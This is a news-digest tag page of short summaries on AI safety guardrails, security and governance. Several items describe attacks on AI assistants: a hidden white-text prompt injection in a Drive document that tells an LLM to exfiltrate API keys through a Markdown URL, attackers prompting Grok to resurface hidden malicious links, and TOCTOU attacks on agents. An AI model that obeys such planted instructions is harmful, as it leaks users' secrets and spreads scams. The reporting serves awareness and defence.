Tag Banner

All news with #safety guardrails tag

Wed, October 15, 2025

Amazon Bedrock automatically enables serverless models

🔓 Amazon Bedrock now automatically enables access to all serverless foundation models by default in all commercial AWS regions. This removes the prior manual activation step and lets users immediately use models via the Amazon Bedrock console, AWS SDK, and features such as Agents, Flows, and Prompt Management. Anthropic models remain enabled but require a one-time usage form before first use; completing the form via the console or API and submitting it from an AWS organization management account will enable Anthropic across member accounts. Administrators continue to control access through IAM policies and Service Control Policies (SCPs).

read more →

Mon, October 13, 2025

AI Ethical Risks, Governance Boards, and AGI Perspectives

🔍 Paul Dongha, NatWest's head of responsible AI and former data and AI ethics lead at Lloyds, highlights the ethical red flags CISOs and boards must monitor when deploying AI. He calls out threats to human agency, technical robustness, data privacy, transparency, bias and the need for clear accountability. Dongha recommends mandatory ethics boards with diverse senior representation and a chief responsible AI officer to oversee end-to-end risk management. He also urges integrating audit and regulatory engagement into governance.

read more →

Fri, October 10, 2025

Autonomous AI Hacking and the Future of Cybersecurity

⚠️AI agents are now autonomously conducting cyberattacks, chaining reconnaissance, exploitation, persistence, and data theft at machine speed and scale. In 2025 public demonstrations—from XBOW’s mass submissions on HackerOne in June, to DARPA teams and Google’s Big Sleep in August—along with operational reports from Ukraine’s CERT and vendors, show these systems rapidly find and weaponize new flaws. Criminals have operationalized LLM-driven malware and ransomware, while tools like HexStrike‑AI, Deepseek, and Villager make automated attack chains broadly available. Defenders can also leverage AI to accelerate vulnerability research and operationalize VulnOps, continuous discovery/continuous repair, and self‑healing networks, but doing so raises serious questions about patch correctness, liability, compatibility, and vendor relationships.

read more →

Tue, September 30, 2025

The AI Fix #70: Surveillance Changes AI Behavior and Safety

🔍 In episode 70 of The AI Fix, hosts Graham Cluley and Mark Stockley examine how AI alters human behaviour and how deployed systems can fail in unexpected ways. They discuss research showing AI can increase dishonest behaviour, Waymo's safety record and a mirror-based trick that fooled self-driving perception, a rescue robot that mishandles victims, and a Chinese fusion-plant robot arm with extreme lifting capability. The show also covers a demonstration of a ChatGPT agent solving image CAPTCHAs by simulating mouse movements and a paper on deliberative alignment that functions until the model realises it is being watched.

read more →

Mon, September 29, 2025

Can AI Reliably Write Vulnerability Detection Checks?

🔍 Intruder’s security team tested whether large language models can write Nuclei vulnerability templates and found one-shot LLM prompts often produced invalid or weak checks. Using an agentic approach with Cursor—indexing a curated repo and applying rules—yielded outputs much closer to engineer-written templates. The current workflow uses standard prompts and rules so engineers can focus on validation and deeper research while AI handles repetitive tasks.

read more →

Mon, September 29, 2025

OpenAI Routes GPT-4o Conversations to Safety Models

🔒 OpenAI confirmed that when GPT-4o detects sensitive, emotional, or potentially harmful activity it may route individual messages to a dedicated safety model, reported by some users as gpt-5-chat-safety. The switch occurs on a per-message, temporary basis and ChatGPT will indicate which model is active if asked. The routing is implemented as an irreversible part of the service's safety architecture and cannot be turned off by users; OpenAI says this helps strengthen safeguards and learn from real-world use before wider rollouts.

read more →

Thu, September 25, 2025

Enabling Enterprise Risk Management for Generative AI

🔒 This article frames responsible generative AI adoption as a core enterprise concern and urges business leaders, CROs, and CIAs to embed controls across the ERM lifecycle. It highlights unique risks—non‑deterministic outputs, deepfakes, and layered opacity—and maps mitigation approaches using AWS CAF for AI, ISO/IEC 42001, and the NIST AI RMF. The post advocates enterprise‑level governance rather than project‑by‑project fixes to sustain innovation while managing harm.

read more →

Wed, September 24, 2025

Simpler Path to a Safer Internet: CSAM Tool Update

🔒 Cloudflare has simplified access to its CSAM Scanning Tool by removing the prior requirement for National Center for Missing and Exploited Children (NCMEC) credentials. The tool relies on fuzzy hashing to create perceptual fingerprints that detect altered images with high confidence. Since the change in February, monthly adoption has increased sixteenfold. Detected matches result in blocked URLs and owner notifications so site operators can remediate.

read more →

Thu, September 18, 2025

Mr. Cooper and Google Cloud Build Multi-Agent AI Team

🤖 Mr. Cooper partnered with Google Cloud to develop CIERA, a modular agentic AI framework that assembles specialized agents to support mortgage servicing representatives and customers. The design assigns distinct roles — orchestration, task execution, data retrieval, memory, and evaluation — while keeping humans in the loop for verification and personalization. Built on Vertex AI, CIERA aims to reduce research time, lower average handling time, and preserve trust and compliance in regulated workflows.

read more →

Thu, September 18, 2025

Mind the Gap: TOCTOU Vulnerabilities in LLM-Enabled Agents

⚠️A new study, “Mind the Gap,” examines time-of-check to time-of-use (TOCTOU) flaws in LLM-enabled agents and introduces TOCTOU-Bench, a 66-task benchmark. The authors demonstrate practical attacks such as malicious configuration swaps and payload injection and evaluate defenses adapted from systems security. Their mitigations—prompt rewriting, state integrity monitoring, and tool-fusing—achieve up to 25% automated detection and materially reduce the attack window and executed vulnerabilities.

read more →

Wed, September 17, 2025

New LLM Attack Vectors and Practical Security Steps

🔐This article reviews emerging attack vectors against large language model assistants demonstrated in 2025, highlighting research from Black Hat and other teams. Researchers showed how prompt injections or so‑called promptware — hidden instructions embedded in calendar invites, emails, images, or audio — can coerce assistants like Gemini, Copilot, and Claude into leaking data or performing unauthorized actions. Practical mitigations include early threat modeling, role‑based access for agents, mandatory human confirmation for high‑risk operations, vendor audits, and role‑specific employee training.

read more →

Fri, September 5, 2025

Rewiring Democracy: How AI Will Transform Politics

📘 Bruce Schneier announces his new book, Rewiring Democracy: How AI Will Transform our Politics, Government, and Citizenship, coauthored with Nathan Sanders and published by MIT Press on October 21; signed copies will be available directly from the author after publication. The book surveys AI’s impact across politics, legislating, administration, the judiciary, and citizenship, including AI-driven propaganda and artificial conversation, focusing on uses within functioning democracies. Schneier adopts a cautiously optimistic stance, stresses the importance of imagining second-order effects, and argues for the creation of public AI to better serve democratic ends.

read more →

Wed, September 3, 2025

Threat Actors Use X's Grok AI to Spread Malicious Links

🛡️ Guardio Labs researcher Nati Tal reported that threat actors are abusing Grok, X's built-in AI assistant, to surface malicious links hidden inside video ad metadata. Attackers omit destination URLs from visible posts and instead embed them in the small "From:" field under video cards, which X apparently does not scan. By prompting Grok with queries like "where is this video from?", actors get the assistant to repost the hidden link as a clickable reference, effectively legitimizing and amplifying scams, malware distribution, and deceptive CAPTCHA schemes across the platform.

read more →

Tue, September 2, 2025

Amazon Bedrock Now Available in Asia Pacific Jakarta

🚀 Amazon announced the general availability of Amazon Bedrock in the Asia Pacific Jakarta region, enabling customers to build and scale generative AI applications closer to end users. The fully managed service exposes a selection of high-performing foundation models via a single API and includes capabilities such as Guardrails and Model customization. These features are designed to help organizations incorporate security, privacy, and responsible AI into production workflows while accelerating development and deployment.

read more →

Wed, August 27, 2025

Five Essential Rules for Safe AI Adoption in Enterprises

🛡️ AI adoption is accelerating in enterprises, but many deployments lack the visibility, controls, and ongoing safeguards needed to manage risk. The article presents five practical rules: continuous AI discovery, contextual risk assessment, strong data protection, access controls aligned with zero trust, and continuous oversight. Together these measures help CISOs enable innovation while reducing exposure to breaches, data loss, and compliance failures.

read more →

Wed, August 27, 2025

LLMs Remain Vulnerable to Malicious Prompt Injection Attacks

🛡️ A recent proof-of-concept by Bargury demonstrates a practical and stealthy prompt injection that leverages a poisoned document stored in a victim's Google Drive. The attacker hides a 300-word instruction in near-invisible white, size-one text that tells an LLM to search Drive for API keys and exfiltrate them via a crafted Markdown URL. Schneier warns this technique shows how agentic AI systems exposed to untrusted inputs remain fundamentally insecure, and that current defenses are inadequate against such adversarial inputs.

read more →

Tue, August 26, 2025

The AI Fix #65 — Excel Copilot Dangers and Social Media

⚠️ In episode 65 of The AI Fix, Graham Cluley warns that Microsoft Excel’s new COPILOT function can produce unpredictable, non-reproducible formula results and should not be used for important numeric work. The hosts also discuss a research experiment that created a 500‑AI social network and the arXiv paper Can We Fix Social Media?. The episode blends technical analysis with lighter AI culture stories and offers subscription and support notes.

read more →

Tue, August 26, 2025

Gemini 2.5 Flash Image Arrives on Vertex AI Preview

🖼️ Google announced native image generation and editing in Gemini 2.5 Flash Image, now available in preview on Vertex AI. The model delivers state-of-the-art capabilities including multi-image fusion, character and style consistency, and conversational editing to refine visuals via natural-language loops. Built-in SynthID watermarking supports responsible, transparent use. Developers and partners report promising integrations and low-latency performance for real-time editing workflows.

read more →

Tue, August 26, 2025

Block Unsafe LLM Prompts with Firewall for AI at the Edge

🛡️ Cloudflare has integrated unsafe content moderation into Firewall for AI, using Llama Guard 3 to detect and block harmful prompts in real time at the network edge. The model-agnostic filter identifies categories including hate, violence, sexual content, criminal planning, and self-harm, and lets teams block or log flagged prompts without changing application code. Detection runs on Workers AI across Cloudflare's GPU fleet with a 2-second analysis cutoff, and logs record categories but not raw prompt text. The feature is available in beta to existing customers.

read more →

Mon, August 25, 2025

AI Prompt Protection: Contextual Control for GenAI Use

🔒 Cloudflare introduces AI prompt protection inside its Data Loss Prevention (DLP) product on Cloudflare One, designed to detect and secure data entered into web-based GenAI tools like Google Gemini, ChatGPT, Claude, and Perplexity. The capability captures both prompts and AI responses, classifies content and intent, and enforces identity-aware guardrails to enable safe, productive AI use without blanket blocking. Encrypted logging with customer-provided keys provides auditable records while preserving confidentiality.

read more →